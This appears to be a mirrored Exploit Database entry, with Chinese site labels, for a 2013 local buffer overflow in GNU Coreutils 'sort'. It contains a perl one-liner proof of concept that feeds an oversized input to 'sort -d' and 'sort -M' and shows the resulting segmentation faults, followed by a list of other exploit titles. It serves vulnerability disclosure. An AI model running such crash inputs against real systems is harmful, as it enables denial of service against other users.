GNU Coreutils ‘sort’ Text Utility – Local Buffer Overflow

Exploit Database
11 阅读

作者： anonymous

日期： 2013-01-21
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/38232/

source: https://www.securityfocus.com/bid/57492/info

GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input.

A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed. 

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d
[1] 13431 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13432 segmentation fault sort -d

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M
[1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13434 segmentation fault sort -M

last Exploits
GNU Coreutils ‘sort’ Text Utility – Local Buffer Overflow的更多信息

Adobe – FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)：
Trend Micro Titanium Maximum Security 2011 – Local Kernel：
Sonique 1.96 – ‘.m3u’ Local Buffer Overflow：
DJ Studio Pro 5.1 – ‘.pls’ Local Stack Buffer Overflow (Metasploit)：
Microsoft Windows – Task Scheduler Privilege Escalation：
EMC Replication Manager < 5.3 - Command Execution (Metasploit)：
Dameware Remote Support 12.1.1.273 – Buffer Overflow (SEH)：
Exim 4.87 – 4.91 – Local Privilege Escalation：